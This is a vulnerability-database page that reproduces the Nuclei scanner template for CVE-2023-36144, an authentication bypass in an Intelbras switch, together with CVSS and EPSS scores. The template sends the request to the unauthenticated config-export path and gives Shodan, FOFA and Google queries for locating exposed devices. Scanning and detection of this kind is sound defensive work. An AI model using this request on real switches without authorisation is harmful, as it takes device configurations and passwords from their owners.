Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-36144
HistoryNov 23, 2023 - 9:22 a.m.

Intelbras Switch - Information Disclosure

2023-11-2309:22:57
ProjectDiscovery
github.com
11
intelbras
switch
information disclosure
vulnerability
firmware
cve2023

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.034 Low

EPSS

Percentile

91.5%

An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration.
id: CVE-2023-36144

info:
  name: Intelbras Switch - Information Disclosure
  author: gy741
  severity: high
  description: |
    An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-36144
    - https://github.com/leonardobg/CVE-2023-36144
    - http://intelbras.com
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-36144
    cwe-id: CWE-862
    epss-score: 0.03179
    epss-percentile: 0.91154
    cpe: cpe:2.3:o:intelbras:sg_2404_mr_firmware:1.00.54:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: intelbras
    product: sg_2404_mr_firmware
    shodan-query:
      - title:"Intelbras"
      - http.title:"intelbras"
    fofa-query: title="intelbras"
    google-query: intitle:"intelbras"
  tags: cve2023,cve,intelbras,switch,exposure

http:
  - method: GET
    path:
      - '{{BaseURL}}/cgi-bin/exportCfgwithpasswd'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'System Description'
          - 'System Version'
          - 'System Name'
        condition: and

      - type: word
        part: header
        words:
          - 'attachment;filename='

      - type: status
        status:
          - 200
# digest: 490a00463044022015c8d803dd17aa15d2b5b1fd7082fa9e5137cef412e74f60e9f69a8f170226a70220359f792ecb6d7df6a0bba14872b10f3d32a06043c855bd4c8f2b347eeff46deb:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.034 Low

EPSS

Percentile

91.5%

Related for NUCLEI:CVE-2023-36144